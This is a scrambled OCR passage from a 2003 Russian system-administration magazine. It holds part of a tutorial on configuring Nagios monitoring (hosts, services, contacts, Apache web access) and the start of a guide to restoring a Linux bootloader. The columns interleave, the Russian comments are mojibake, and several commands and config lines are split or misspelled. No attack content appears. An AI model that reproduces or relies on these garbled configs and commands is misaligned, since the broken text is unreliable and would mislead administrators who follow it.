total 92 Nov 11 16:13 timeperiods.cfg host_name mail
-rw-rw-r-- 1 nagios nagios 17028 # Èìÿ õîñòà
Nov 11 15:41 cgi.cfg-sample К сожалению, файлы все еще не alias Mail Server
-rw-rw-r-- 1 nagios nagios 4480 # Ïñåâäîíèì õîñòà
Nov 11 15:41 checkcommands.cfg-sample готовы к употреблению. Nagios даже address mail.regata.ru
-rw-rw-r-- 1 nagios nagios 1577 не сможет стартовать, если мы попы- # Èìÿ õîñòà â ôîðìàòå fqdn èëè åãî
Nov 11 15:41 contactgroups.cfg-sample # àäðåñ
-rw-rw-r-- 1 nagios nagios 1485 таемся его запустить. Разобраться в check_command check-host-alive
Nov 11 15:41 contacts.cfg-sample содержимом файлов-примеров, со- # Êîìàíäà ïðîâåðêè õîñòà âûïîëíÿåòñÿ
-rw-rw-r-- 1 nagios nagios 1651 # îáû÷íî ñ ïîìîùüþ ping. Ïîäðîáíåå
Nov 11 15:41 dependencies.cfg-sample зданных во время инсталляции, до- # ìîæíî ïî÷èòàòü â ôàéëå
-rw-rw-r-- 1 nagios nagios 2022 вольно сложно. Самым лучшим выхо- # checkcommands.cfg
Nov 11 15:41 escalations.cfg-sample max_check_attempts 10
-rw-rw-r-- 1 nagios nagios 1658 дом из подобной ситуации будет унич- # Êîëè÷åñòâî ïîïûòîê ïîâòîðíîãî òåñ-
Nov 11 15:41 hostgroups.cfg-sample тожение всех конфигурационных дан- # òèðîâàíèÿ, ïîñëå òîãî êàê îäíà èç
-rw-rw-r-- 1 nagios nagios 5774 # ïîïûòîê âîçâðàòèëà îøèáî÷íûé
Nov 11 15:41 hosts.cfg-sample ных и создание их вручную под моим # ñòàòóñ.
-rw-rw-r-- 1 nagios nagios 4277 чутким руководством. Такой подход
Nov 11 15:41 misccommands.cfg-sample notification_interval 120
-rw-rw-r-- 1 nagios nagios 21332 принесет более глубокое понимание # Èíòåðâàë â ìèíóòàõ, ïî ïðîøåñòâèþ
Nov 11 15:41 nagios.cfg-sample используемой методики настройки. # êîòîðîãî íóæíî ïîâòîðíî îòñûëàòü
-rw-rw---- 1 nagios nagios 3074 # óâåäîìëåíèå, åñëè ñåðâåð âñå åùå
Nov 11 15:41 resource.cfg-sample Обнуляем все необходимые файлы. # íå ðàáîòàåò.
-rw-rw-r-- 1 nagios nagios 17668 notification_period 24x7
Nov 11 15:41 services.cfg-sample # Ïåðèîä âðåìåíè, â òå÷åíèå êîòîðîãî
-rw-rw-r-- 1 nagios nagios 1594 # cp /dev/null hosts.cfg # ñåðâåðó ðàçðåøåíî áåñïîêîèòü àäìè-
Nov 11 15:41 timeperiods.cfg-sample services.cfg contacts.cfg # íèñòðàòîðà ñâîèìè óâåäîìëåíèÿìè.
contactgroups.cfg hostgroups.cfg #  äàííîì ñëó÷àå ýòî êðóãëûå ñóòêè.
# cp /dev/null dependencies.cfg # Ïîäðîáíåå î ïåðèîäàõ ìîæíî
В названии каждого файла есть escalations.cfg # ïî÷èòàòü â ôàéëå timeperiods.cfg.
notification_options d,u,r
фрагмент -sample, значит, все выше- # Ñïèñîê ñîáûòèé, ïðè íàñòóïëåíèè
перечисленные файлы являются не Начиная с версии 1.0b2, в Nagios # êîòîðûõ íåîáõîäèìî îòñûëàòü
# óâåäîìëåíèÿ. Ñîîòâåòñòâåííî d,u,r
полноценными конфигурациями, а появилась возможность использовать # (DOWN, UNREACHABLE, RECOVERY)
всего лишь примерами. На случай, шаблоны внутри конфигурационных # îçíà÷àåò ñîáûòèÿ “ðàáîòàåò”,
# “íåäîñòóïåí”, “âîññòàíîâëåí”.
если нам вдруг захочется посмотреть, файлов. Такая методика настройки }
что там у них внутри, скопируем их в позволяет многократно снизить вре-
# Îïèñûâàåì õîñò ïî èìåíè proxy
директорию sample. Может быть, ког- мя создания рабочей конфигурации. define host{
да-то они нам еще пригодятся. Перед нами стоит задача описать два use generic-host
host_name proxy
хоста mail.regata.ru и proxy.regata.ru. # Èìÿ õîñòà. Òàêæå ñòîèò îáðàòèòü
# mkdir sample Каждый сервер, находящийся под на- # âíèìàíèå íà èçìåíèâøèåñÿ çàïèñè
# cp * ./sample # alias è address.
блюдением, должен быть описан в alias Proxy Server
файле хостов. Поэтому первым делом address proxy.regata.ru
check_command check-host-alive
Переименовываем все файлы, от- заполняем именно этот файл. max_check_attempts 10
секая цепочку символов –sample. Та- notification_interval 120
ким образом мы готовим файлы к Содержимое файла notification_period
notification_options
24x7
d,u,r
тому, чтобы Nagios смог их заметить hosts.cfg }
и правильно воспринять. В результа-
те должно получиться что-то вроде: # Îïèñûâàåì øàáëîí õîñòà Каждый хост должен состоять хотя
define host{
name бы в одной группе хостов. Опираясь
# ll generic-host на группы хостов, Nagios сможет оп-
total 94 # Èìÿ øàáëîíà – áóäåì ññûëàòüñÿ íà
-rw-rw-r-- 1 nagios nagios 17028 # íåãî ïîçæå ïðè îïèñàíèè êàæäîãî ределить, какую из групп админист-
Nov 11 16:13 cgi.cfg # õîñòà раторов нужно оповещать. Данные,
-rw-rw-r-- 1 nagios nagios 4480 notifications_enabled 1
Nov 11 16:13 checkcommands.cfg # Âêëþ÷àåì óâåäîìëåíèÿ полностью описывающие группы хо-
-rw-rw-r-- 1 nagios nagios 1577 event_handler_enabled 1 стов, находятся в файле host-
Nov 11 16:13 contactgroups.cfg # Âêëþ÷àåì îáðàáîò÷èê ñîáûòèé
-rw-rw-r-- 1 nagios nagios 1485 flap_detection_enabled 1 groups.cfg. Формат этого файла на-
Nov 11 16:13 contacts.cfg # Âêëþ÷àåì îáíàðóæåíèå ìåðöàíèÿ столько прост, что механизм шабло-
-rw-rw-r-- 1 nagios nagios 1651 process_perf_data 1
Nov 11 16:13 dependencies.cfg # Ñîáèðàòü ñòàòèñòèêó îá ýôôåêòèâ- нов применять смысла нет. Посмот-
-rw-rw-r-- 1 nagios nagios 2022 # íîñòè ðàáîòû ïðîöåññà рим, чем заполнен этот файл.
Nov 11 16:13 escalations.cfg retain_status_information 1
-rw-rw-r-- 1 nagios nagios 1658 # Ñîõðàíÿòü ñòàòóñíóþ èíôîðìàöèþ
Nov 11 16:13
-rw-rw-r--
hostgroups.cfg
1 nagios nagios 5774
# ìåæäó ïåðåçàãðóçêàìè ïðîãðàììû
retain_nonstatus_information 1
Содержимое файла
Nov 11 16:13 hosts.cfg # Ñîõðàíÿòü íåñòàòóñíóþ èíôîðìàöèþ hostgroups.cfg
-rw-rw-r-- 1 nagios nagios 4277 # ìåæäó ïåðåçàãðóçêàìè ïðîãðàììû
Nov 11 16:13 misccommands.cfg register 0 define hostgroup{
-rw-rw-r-- 1 nagios nagios 21332 # Óêàçûâàåì, ÷òî âñå âûøåîïèñàííîå – hostgroup_name regata-servers
Nov 11 16:13 nagios.cfg # ýòî øàáëîí. Çàïðåùàåì ðåãèñòðèðî-
-rw-rw---- 1 nagios nagios 3074 # âàòü ýòî îïèñàíèå êàê õîñò # Èìÿ ãðóïïû
alias Regata Servers
Nov 11 16:13 resource.cfg } # Ïñåâäîíèì ãðóïïû
drwxr-xr-x 2 root nagios 512
Nov 11 16:07 sample # Îïèñûâàåì õîñò ïî èìåíè mail contact_groups regata-admins
# Ñïèñîê ãðóïï êîíòàêòîâ, êîòîðûå
-rw-rw-r-- 1 nagios nagios 17668 define host{ # íóæíî óâåäîìëÿòü
Nov 11 16:13 services.cfg use generic-host
members mail proxy

№2(3), февраль 2003 11

 администрирование
# Ñïèñîê ñåðâåðîâ, ïðèíàäëåæàùèõ ê
# ãðóïïå
} max_check_attemps
Пришло время вплотную занять-
ся описанием сервисов, за которыми
нужно наблюдать. Как и во всех ос-
тальных конфигурационных файлах,
первым делом необходимо создать
шаблон сервиса. Мы разберем его
подробно. Затем второй и третьей
записью будут описаны сервисы HTTP
и PING, базирующиеся на хосте
proxy.regata.ru. Соответственно, да-
лее мы работаем с mail.regata.ru, на
котором у нас базируются SMTP и
IMAP.
Содержимое файла
services.cfg
# Îïèñûâàåì øàáëîí ñåðâèñà
define service{
name generic-service
# Èìÿ øàáëîíà
active_checks_enabled 1
# Âêëþ÷èòü àêòèâíûå ïðîâåðêè
passive_checks_enabled 1
# Ïðèíèìàòü ðåçóëüòàòû ïàññèâíûõ
# ïðîâåðîê
parallelize_check 1
# Àêòèâíûå ïðîâåðêè ëó÷øå âûïîëíÿòü
# ïàðàëëåëüíî – òàêîé ïîäõîä
# ïîâûøàåò ñêîðîñòü ðàáîòû
obsess_over_service 0
# Ýòó îïöèþ ñòîèò âêëþ÷àòü òîëüêî
# ïðè ñîçäàíèè ðàñïðåäåëåííîé
# ñèñòåìû ìîíèòîðèíãà
check_freshness 0 # ïðîâåðîê
# Ñëåäèòü çà ñâåæåñòüþ ðåçóëüòàòîâ
# ïðîâåðîê. Ïî óìîë÷àíèþ îòêëþ÷åíî
notifications_enabled 1
# Óâåäîìëåíèÿ âêëþ÷åíû
event_handler_enabled 1
# Âêëþ÷èòü îáðàáîò÷èêè ñîáûòèé
flap_detection_enabled 1
# Èñïîëüçîâàòü îáíàðóæåíèå ìåðöàíèÿ
process_perf_data 1
# Ñîáèðàòü äàííûå îá ýôôåêòèâíîñòè
# âûïîëíåíèÿ ïðîâåðîê
retain_status_information 1
# Ñîõðàíÿòü èíôîðìàöèþ î ñòàòóñå
# ìåæäó ïåðåçàïóñêàìè Nagios
retain_nonstatus_information 1
# Ñîõðàíÿòü íåñòàòóñíóþ èíôîðìàöèþ
# ìåæäó ïåðåçàïóñêàìè Nagios
register 0 # ïðîèçâîäèòü îòïðàâêó óâåäîìëåíèé
# Çàïðåùàåì ðåãèñòðèðîâàòü ýòî
# îïèñàíèå êàê ñåðâèñ
} # êîòîðûõ íåîáõîäèìî
# Îïèñûâàåì ñåðâèñ HTTP äëÿ õîñòà
# proxy.regata.rudefine service{
use generic-service
# Èìÿ èñïîëüçóåìîãî øàáëîíà
hostname proxy.regata.ru
# Èìÿ õîñòà
service_description HTTP
# Îïèñàíèå ñåðâèñà
is_volatile 0
# Äëÿ ñòàíäàðòíûõ ñåðâèñîâ ëó÷øå
# îñòàâèòü çíà÷åíèå 0. Ê íåñòàíäàðò-
# íûì ñåðâèñàì ñòîèò îòíîñèòü òå
# ñåðâèñû, êîòîðûå ïîñëå êàæäîé
# ïðîâåðêè àâòîìàòè÷åñêè âîçâðàùàþòñÿ
# â ñîñòîÿíèå “ÎÊ” âíå çàâèñèìîñòè
# îò ðåæèìà, â êîòîðîì îíè
# íàõîäèëèñü äî ïðîâåðêè.
check_period 24x7
12
# Ïåðèîä, â òå÷åíèå êîòîðîãî ìîæíî
# âûïîëíÿòü ïðîâåðêè
3 check_command check_smtp
# Ìàêñèìàëüíîå êîëè÷åñòâî ïîâòîðíûõ
# ïðîâåðîê
normal_check_interval 5 }
# Èíòåðâàë ìåæäó íîðìàëüíûìè
# ïðîâåðêàìè
retry_check_interval 1 # mail.regata.rudefine service{
# Èíòåðâàë ìåæäó ïîâòîðíûìè ïðîâåð-
# êàìè. Ïðèìåíÿåòñÿ, åñëè íîðìàëüíàÿ
# ïðîâåðêà çàâåðøèëàñü íåóäà÷íî
contact_groups regata-admins
# Ãðóïïà êîíòàêòîâ, èñïîëüçóåìàÿ
# äëÿ îïîâåùåíèÿ
notification_interval 120
# Èíòåðâàë (â ìèíóòàõ), ïîñëå
# êîòîðîãî íóæíî ïîñëàòü ïîâòîðíîå
# óâåäîìëåíèå, åñëè ñåðâèñ òàê è íå
# âîññòàíîâèëñÿ
notification_period 24x7
# Ïåðèîä, â òå÷åíèå êîòîðîãî ìîæíî
# ïðîèçâîäèòü îòïðàâêó óâåäîìëåíèé
notification_options w,u,c,r
# Ñïèñîê ñîáûòèé, ïðè íàñòóïëåíèè
# êîòîðûõ íåîáõîäèìî
# îòñûëàòü óâåäîìëåíèÿ.
check_command check_http
# Èìÿ êîìàíäû, âûïîëíÿåìîé äëÿ
# ïðîâåðêè ñåðâèñà
} для выполнения проверки того или
# Îïèñûâàåì ñåðâèñ PING äëÿ õîñòà
# proxy.regata.rudefine service{
use generic-service
# Èìÿ èñïîëüçóåìîãî øàáëîíà
hostname proxy.regata.ru
# Èìÿ õîñòà
service_description PING
# Îïèñàíèå ñåðâèñà
is_volatile 0
check_period 24x7
# Ïåðèîä, â òå÷åíèå êîòîðîãî ìîæíî
# âûïîëíÿòü ïðîâåðêè
max_check_attemps 3 сутствует. Видимо, это еще одна
# Ìàêñèìàëüíîå êîëè÷åñòâî ïîâòîðíûõ
normal_check_interval 5 ладно, нам не привыкать делать все
# Èíòåðâàë ìåæäó íîðìàëüíûìè
# ïðîâåðêàìè
retry_check_interval 1 любом месте файла checkcom-
# Èíòåðâàë ìåæäó ïîâòîðíûìè ïðîâåð-
# êàìè. Ïðèìåíÿåòñÿ, åñëè íîðìàëü-
# íàÿ ïðîâåðêà çàâåðøèëàñü íåóäà÷íî
contact_groups regata-admins
# Ãðóïïà êîíòàêòîâ, èñïîëüçóåìàÿ
# äëÿ îïîâåùåíèÿ
notification_interval 120
# Èíòåðâàë (â ìèíóòàõ), ïîñëå
# êîòîðîãî íóæíî ïîñëàòü ïîâòîðíîå
# óâåäîìëåíèå, åñëè ñåðâèñ òàê è íå
# âîññòàíîâèëñÿ
notification_period 24x7
# Ïåðèîä, â òå÷åíèå êîòîðîãî ìîæíî
notification_options w,u,c,r
# Ñïèñîê ñîáûòèé, ïðè íàñòóïëåíèè
# îòñûëàòü óâåäîìëåíèÿ.
check_command check_ping
# Èìÿ êîìàíäû, âûïîëíÿåìîé äëÿ
# ïðîâåðêè ñåðâèñà
}
# Îïèñûâàåì ñåðâèñ SMTP äëÿ õîñòà
# mail.regata.rudefine service{
use generic-service
hostname mail.regata.ru
service_description SMTP
# Îïèñàíèå ñåðâèñà
is_volatile 0
check_period 24x7
max_check_attemps 3 contact_name
normal_check_interval 5
retry_check_interval 1 alias
contact_groups regata-admins
notification_interval 120
notification_period 24x7
notification_options w,u,c,r
# Èìÿ êîìàíäû, âûïîëíÿåìîé äëÿ
# ïðîâåðêè ñåðâèñà
# Îïèñûâàåì ñåðâèñ IMAP äëÿ õîñòà
use generic-service
hostname mail.regata.ru
service_description IMAP
# Îïèñàíèå ñåðâèñà
is_volatile 0
check_period 24x7
max_check_attemps 3
normal_check_interval 5
retry_check_interval 1
contact_groups regata-admins
notification_interval 120
notification_period 24x7
notification_options w,u,c,r
check_command check_imap
# Èìÿ êîìàíäû, âûïîëíÿåìîé äëÿ
# ïðîâåðêè ñåðâèñà
}
Как вы, возможно, сумели дога-
даться, имена команд, вызываемых
иного сервиса, определяются пара-
метром check_command. Сами же ко-
манды описываются в файле
checkcommands.cfg. По странному
стечению обстоятельств команда
check_imap в этом файле не описана,
несмотря на то что среди модулей, ус-
тановленных в директорию /usr/local/
nagios/libexec/, файл check_im-ap при-
ошибка программистов Nagios. Ну и
собственными руками. Разместим на
mands.cfg следующие строки:
# 'check_imap' command definition
define command{
command_name check_imap
command_line $USER1$/
check_imap -H $HOSTADDRESS$
}
Создав описание сервисов, самое
время перейти к определению списка
людей, которым система будет отсы-
лать оповещения. В терминологии
Nagios каждая запись в файле
contacts.cfg, описывающая человека, –
это контакт. Формат записи довольно
прост, поэтому и в данном случае шаб-
лоны нам не пригодятся.
Содержимое файла
contacts.cfg
define contact{
tigrisha
# Èìÿ êîíòàêòà
Andrei Beshkov
# Èìÿ ÷åëîâåêà
service_notification_period 24x7

# Ïåðèîä âðåìåíè, â òå÷åíèå êîòîðîãî
# ðàçðåøåíî ïîñûëàòü óâåäîìëåíèÿ
# î ñîñòîÿíèè ñåðâèñîâ
host_notification_period 24x7
# Ïåðèîä âðåìåíè, â òå÷åíèå êîòîðîãî
# ðàçðåøåíî ïîñûëàòü óâåäîìëåíèÿ
# î ñîñòîÿíèè õîñòîâ
service_notification_options w,u,c,r
# Ñïèñîê ñîáûòèé ñåðâèñîâ, ïðè
# íàñòóïëåíèè êîòîðûõ íåîáõîäèìî
# îòñûëàòü óâåäîìëåíèÿ.
host_notification_options d,u,r
# Ñïèñîê ñîáûòèé õîñòîâ, ïðè
# íàñòóïëåíèè êîòîðûõ íåîáõîäèìî
# îòñûëàòü óâåäîìëåíèÿ
service_notification_commands
notify-by-email, notify-by-epager
# Êîìàíäû ðàññûëêè óâåäîìëåíèé î
# ñîáûòèÿõ ñåðâèñà
host_notification_commands host-
notify-by-email, host-notify-by-epager
# Êîìàíäû ðàññûëêè óâåäîìëåíèé î
# ñîáûòèÿõ õîñòà
email admin@regata.ru
# Ïî÷òîâûé àäðåñ
pager 150345865@pager.icq.com
# Àäðåñ ñèñòåìû ïåéäæèíãà
} плана.
define contact{
contact_name amon
# Èìÿ êîíòàêòà
alias Dmitry Larin
# Èìÿ ÷åëîâåêà
service_notification_period 24x7
# Ïåðèîä âðåìåíè, â òå÷åíèå êîòîðîãî
# ðàçðåøåíî ïîñûëàòü óâåäîìëåíèÿ î
# ñîñòîÿíèè ñåðâèñîâ
host_notification_period 24x7
# Ïåðèîä âðåìåíè, â òå÷åíèå êîòîðîãî
# ðàçðåøåíî ïîñûëàòü óâåäîìëåíèÿ î
# ñîñòîÿíèè õîñòîâ
service_notification_options w,u,c,r
# Ñïèñîê ñîáûòèé ñåðâèñîâ, ïðè
# íàñòóïëåíèè êîòîðûõ íåîáõîäèìî
# îòñûëàòü óâåäîìëåíèÿ.
host_notification_options d,u,r
# Ñïèñîê ñîáûòèé õîñòîâ, ïðè
# íàñòóïëåíèè êîòîðûõ íåîáõîäèìî
# îòñûëàòü óâåäîìëåíèÿ.
service_notification_commands
notify-by-email, notify-by-epager
# Êîìàíäû ðàññûëêè óâåäîìëåíèé î
# ñîáûòèÿõ ñåðâèñà
host_notification_commands host-
notify-by-email, host-notify-by-epager
# Êîìàíäû ðàññûëêè óâåäîìëåíèé î
# ñîáûòèÿõ õîñòà
email amon@regata.ru
# Ïî÷òîâûé àäðåñ
pager 150345865@pager.icq.com
# Àäðåñ ñèñòåìû ïåéäæèíãà
} Не пугайтесь, если вам довелось
Каждый контакт должен принадле-
жать как минимум одной контактной
группе. Давайте создадим такую груп-
пу для контактов, описанных выше.
Содержимое файла
contactgroups.cfg
define contactgroup{
contactgroup_name regata-admins
# Èìÿ êîíòàêòíîé ãðóïïû
alias regata.ru Admins
# Ïñåâäîíèì ãðóïïû
members tigrisha amon
# Ñïèñîê êîíòàêòîâ, ñîñòîÿùèõ â
# ãðóïïå
} Order allow,deny
Файл dependencies.cfg отвечает за
№2(3), февраль 2003
зависимости между хостами. Ну а
файл escalations.cfg, в свою очередь,
описывает эскалацию оповещений. В
связи с тем, что рассматриваемый
нами пример состоит всего из двух
хостов, файлы зависимостей и эска-
лации нам не пригодятся. Отсюда
вытекает приятный факт, говорящий,
что необходимости заполнять их у нас
нет. Возможно, в следующей статье я
подробно опишу работу с файлами
зависимостей и эскалации.
Конфигурирование, наконец-то,
завершено. Перед пробным запуском
стоит упомянуть, что Nagios может
быть запущен четырьмя способами.
Давайте перечислим их.

Вручную – как процесс переднего

Вручную – как фоновый процесс.

Вручную – как демон.

Автоматически – как демон, при
старте системы.
Для проверки конфигурации вос-
пользуемся способом № 3. Собрав-
шись с духом, можно попытаться за-
пустить систему и начать мониторинг.
Воспользуемся для этих целей скрип-
том nagios.sh.
# /usr/local/etc/rc.d/nagios.sh
После этого должно произойти
одно из двух: либо Nagios начнет ра-
ботать, либо на экране появится сле-
дующая ошибка:
Starting network monitor: nagios
/bin/sh: -l: unrecognized option
наступить на эти грабли. Приведенное
выше сообщение об ошибке значит,
что операционная система, на которой
вы работаете, не поддерживает опцию
-l команды su. В случае с FreeBSD дело
обстоит именно таким образом. По-
этому команда должна выглядеть так:
su -. В файле /usr/local/etc/rc.d/ nagios.sh
ищем строку, содержущую символы su
-l, и удаляем из нее букву l. Вот теперь-
то все должно работать как положено.
Снова запускаем Nagios. Проверяем,
как он себя чувствует с помощью клю-
ча командной строки status.
# /usr/local/etc/rc.d/nagios.sh
status
PID TT STAT TIME COMMAND
администрирование
101 ?? Ss 0:20.81 /usr/
local/nagios/bin/nagios -d /usr/local/
nagios/etc
Если, несмотря на все принятые
предосторожности, Nagios продолжа-
ет кричать об ошибках, то стоит убе-
диться, что директория /usr/local/
nagios/ вместе со всем своим содер-
жимым принадлежит пользователю
nagios и группе nagios. В случае еже-
ли подобные ожидания не оправды-
ваются, выполняем смену владельца.
# chown –R nagios:nagios /usr/
local/nagios/
Ну если и это не помогло, то вам
стоит запустить Nagios в режиме от-
ладки.
# /usr/local/nagios/bin/nagios -v
/usr/local/nagios/etc/nagios.cfg
В режиме отладки тексты сооб-
щений обо всех найденных неполад-
ках будут более подробными. Это
обстоятельство поможет легче и
быстрее обнаружить ошибки. Проце-
дура исправления ошибок в таком
случае довольно проста. Исходя из
этого, я надеюсь, что у вас все по-
лучится, если не с первого, то со
второго раза точно.
Nagios уже выполняет мониторинг
сервисов и при наступлении крити-
ческих событий отправляет оповеще-
ния всем, кому положено. Но по од-
ним оповещениям понять, что проис-
ходит, не так уж и легко. Согласи-
тесь, что в интерактивном режиме
смотреть статистику работы и разби-
раться с проблемами гораздо легче.
Исходя из этого, давайте обратим
наши взоры к процедуре настройки
веб-интерфейса. В данной статье
предполагается, что на машине, за-
нимающейся системой мониторинга,
работает веб-сервер Apache. Он обя-
зан быть хотя бы минимально настро-
ен и должен функционировать дос-
таточно стабильно.
В файле настроек Apache httpd.conf
ищем такой фрагмент текста:
<Directory "/usr/local/apache/
cgi-bin">
AllowOverride None
Options None
Allow from all
</Directory>
13
 администрирование
Сразу же после них добавляем
такие строки:
ScriptAlias /nagios/cgi-bin/ "/usr/
local/nagios/sbin/"
<Directory "/usr/local/nagios/
sbin/">
AllowOverride AuthConfig
Options ExecCGI
Order allow,deny
Allow from all
</Directory>
Alias /nagios/ /usr/local/nagios/
share/
<Directory "/usr/local/nagios/
share/">
AllowOverride AuthConfig
Options None
Order allow,deny
Allow from all
</Directory>
Выполнив эту процедуру, мы со-
здали два псевдонима. Первый – для
cgi директории nagios, находящейся в
«/usr/local/nagios/sbin/». Доступ к ней
можно получить, выполнив подобный
http-запрос: http://ваш сайт/nagios/cgi-
bin/. Второй псевдоним указывает, что
в директории /usr/local/nagios/share/
находятся html-файлы веб-интерфей-
са и справочной документации . Про-
смотреть эти страницы можно, посе-
тив адрес: http://ваш сайт /nagios/.
При попытке посетить эти страницы,
получаем ошибку. Для того чтобы
псевдонимы и авторизация заработа-
ли, нужно создать файл .htaccess в
директории /usr/local/nagios/sbin/ и
внести в него следующие строки:
AuthName "Nagios Access"
AuthType Basic
AuthUserFile /usr/local/nagios/etc/
htpasswd.users
require valid-user
Для вступления в силу выполнен-
ных изменений осталось лишь пере-
запустить Apache.
# /usr/local/apache/bin/apachectl
restart
Таким образом мы объясняем
веб-серверу, что доступ к файлам
директории /usr/local/nagios/sbin/ мо-
жет получить только авторизован-
ный пользователь. Если есть жела-
ние, чтобы пользователи не смогли
войти даже на главную страницу
Nagios без ввода пароля, то нужно
скопировать файл .htaccess из ди-
ректории /usr/local/nagios/sbin/ в /usr/
local/nagios/share/.
14
Список паролей и имен пользовате- use_authentication=1
# Âêëþ÷àåì àóòåíòèôèêàöèþ
лей должен находиться в файле /usr/ # ïîëüçîâàòåëåé
local/nagios/etc/htpasswd.users, который
check_external_commands=1
на данный момент еще не существует. # Ðàçðåøàåì îáðàáàòûâàòü êîìàíäû,
Заводим нового пользователя и заод- # ïåðåäàâàåìûå ïðîöåññó Nagios
# ÷åðåç âåá-èíòåðôåéñ.
но с помощью ключа –c создаем файл.
command_file=/usr/local/nagios/var/
# /usr/local/apache/bin/tpasswd -c nagios.cmd
/usr/local/nagios/etc/htpasswd.users # Ìåñòîïîëîæåíèå ôàéëà âíåøíèõ
tigrisha # êîìàíä.
New password: ******
Re-type new password: ******
Adding password for user tigrisha Для того чтобы внесенные изме-
нения вступили в силу, перезапуска-
С помощью той же команды, но ем процесс Nagios:
без ключа –с, создаем еще одного
пользователя. # /usr/local/etc/rc.d/nagios.sh
restart
# /usr/local/apache/bin/htpasswd /
usr/local/nagios/etc/htpasswd.users
amon Если все сделали правильно, то
New password: ****** теперь самое время наслаждаться
Re-type new password: ******
Adding password for user amon отлично работающей системой мони-
торинга. Мы установили наблюдение
Теперь давайте займемся конфи- за двумя тестовыми хостами. Проце-
гурационным файлом /usr/local/nagios/ дуру добавления остальных хостов
etc/cgi.cfg. Нам нужно изменить неко- оставляю читателю в качестве само-
торые параметры: стоятельного упражнения.
authorized_for_system_information=tigrisha,
amon
# Ñïèñîê ïîëüçîâàòåëåé, êîòîðûì
# ðàçðåøåí ïðîñìîòð èíôîðìàöèè î
# ðàáîòå ïðîöåññà Nagios
authorized_for_configuration_information=
tigrisha, amon
# Ñïèñîê ïîëüçîâàòåëåé, êîòîðûì
# ðàçðåøåí ïðîñìîòð èíôîðìàöèè î
# êîíôèãóðàöèè âñåõ õîñòîâ è
# ñåðâèñîâ. Ïî óìîë÷àíèþ ïîëüçîâàòåëü
# ìîæåò ñìîòðåòü êîíôèãóðàöèþ òîëüêî
# õîñòîâ è ñåðâèñîâ, ïðèíàäëåæàùèõ
# ê åãî êîíòàêòíîé ãðóïïå.
authorized_for_system_commands=tigrisha,
amon
# Ñïèñîê ïîëüçîâàòåëåé, àâòîðèçî-
# âàííûõ äëÿ âûïîëíåíèÿ ÷åðåç
# cmd.cgi êîìàíä óïðàâëåíèÿ
# ïðîöåññîì Nagios.
authorized_for_all_services=tigrisha,
amon
authorized_for_all_hosts=tigrisha,
amon
# Ýòè äâà ïàðàìåòðà îïðåäåëÿþò ñïèñîê
# ïîëüçîâàòåëåé, êîòîðûì ðàçðåøåí
# ïðîñìîòð èíôîðìàöèè îáî âñåõ
# íàáëþäàåìûõ õîñòàõ è ñåðâèñàõ.
# Ïî óìîë÷àíèþ ïîëüçîâàòåëü ìîæåò
# âèäåòü òîëüêî òå õîñòû è ñåðâèñû,
# êîòîðûå ïðèíàäëåæàò ê åãî
# êîíòàêòíîé ãðóïïå.
refresh_rate=10
# ×àñòîòà îáíîâëåíèÿ (â ñåêóíäàõ)
# èíôîðìàöèè, ïðîñìàòðèâàåìîé ÷åðåç
# âåá-èíòåðôåéñ. Ïî óìîë÷àíèþ
# óñòàíîâëåíî 90 ñåêóíä, íî íàì
# òàêîé áîëüøîé èíòåðâàë íå ïîäõîäèò.
# Ïîýòîìó ïîñòàâèì 10 ñåêóíä.
Теперь в файл nagios.cfg вносим
следующие изменения:

ВОССТАНОВЛЕНИЕ ЗАГРУЗКИ
ОПЕРАЦИОННОЙ СИСТЕМЫ LINUX
Как известно, операционные системы (ОС) фирмы
Microsoft, такие как Windows 95, Windows 98, Windows 98
SE и др., при переустановке не сохраняют информацию,
помещенную в основную загрузочную запись (MBR –
Master Boot Record). Поэтому, при переустановке систе-
мы типа Windows в случае параллельного присутствия на
жестком диске еще одной ОС с загрузчиком, хранящем-
ся в ОЗЗ, теряется возможность загрузки этой самой ОС.
Данное краткое руководство посвящено как раз воп-
росу восстановления возможности загрузки ОС Linux на
примере загрузочного диска (или дискеты) дистрибутива
ASPLinux.
В качестве инструментария можно выбрать несколько
вариантов. Первый и более удачный – это загрузка сис-
темы с установочного диска. Второй – с загрузочных дис-
кет или одной загрузочной дискеты. Но второй вариант
имеет преимущество над первым ввиду своей универсаль-
ности. При этом все же желательно иметь достаточную
квалификацию.
Способ первый
Первым шагом необходимо установить загрузку с CD-
ROM и вставить установочный диск.
При появлении надписи «Starting ASPLoader. Press
<ESC> for menu...», нажать Esc и выбрать в меню «ASPlinux
Recovery Console».
После загрузки появится приглашение командного
интерпретатора с правами суперпользователя (пользова-
теля root по умолчанию).
Очередным шагом будет следующая последователь-
ность команд:
mkdir -p /my_root_part mount /dev/hdXy /my_root_part
где X = a, b, c, d в зависимости от установки жесткого
диска (a - master на первом контроллере, b – slave на пер-
вом контроллере, c - master на втором контроллере, d -
slave на втором контроллере), а y – номер раздела, на
котором расположена система /(root) установленной ОС
ASPLinux; my_root_part – имя точки монтирования для раз-
дела /(root); mkdir и mount – команды «создать директо-
рию» и «подмонтировать раздел» соответственно.
Основным и третьим шагом будет собственно восста-
новление ОЗЗ. Вначале необходимо исполнить такую ко-
манду:
chroot /my_root_part
Таким образом, командный интерпретатор будет уже
№2(3), февраль 2003
администрирование
АНДРЕЙ ШЕВЧЕНКО
представлять строку shell с раздела /(root) жесткого диска.
Далее восстанавливаем загрузочную запись в зави-
симости от применяемого загрузчика.
lilo (äëÿ LILO) aspldr -m (äëÿ ASPLoader)
Не забудем выйти отсюда командой:
exit
А потом отмонтировать раздел командой:
umount /my_root_part
Если все прошло гдадко, то можно смело перезагру-
жаться в нормальном режиме, предварительно отключив
загрузку с CD или вытащив его.
Способ второй
Обратимся теперь к более сложному варианту, когда под
рукой нет диска, с помощью которого можно получить
«recovery console» или аналогичный shell.
Для того чтобы воспользоваться таким диском, следу-
ет проделать несколько предварительных операций.
Загружаем систему с любого носителя в любом режи-
ме, чтобы получить shell с правами суперпользователя.
Затем создаем файлы-устройства для разделов жестко-
го диска следующими командами:
mkdir -p /my_dev
mknod /my_dev/hda b 3 0
...
mknod /y_dev/hda15 b 3 15
mknod /my_dev/hdb b 3 64
...
mknod /my_dev/hdb15 b 3 79
mknod /my_dev/hdc b 22 0
...
mknod /my_dev/hdc15 b 22 15
mknod /my_dev/hdd b 22 64
...
mknod /my_dev/hdd15 b 22 79
Выше приведен полный список команд, из которых не-
обходимо использовать лишь те, которые создают файлы-
устройства самого диска (hda, hdb, hdc или hdd), так и те,
которые создают файлы-устройства на раздел, содержа-
щий /(root) восстанавливаемой ОС.
После вышеописанных действий все остальные проце-
дуры повторяются точно также, как и в случае первого ва-
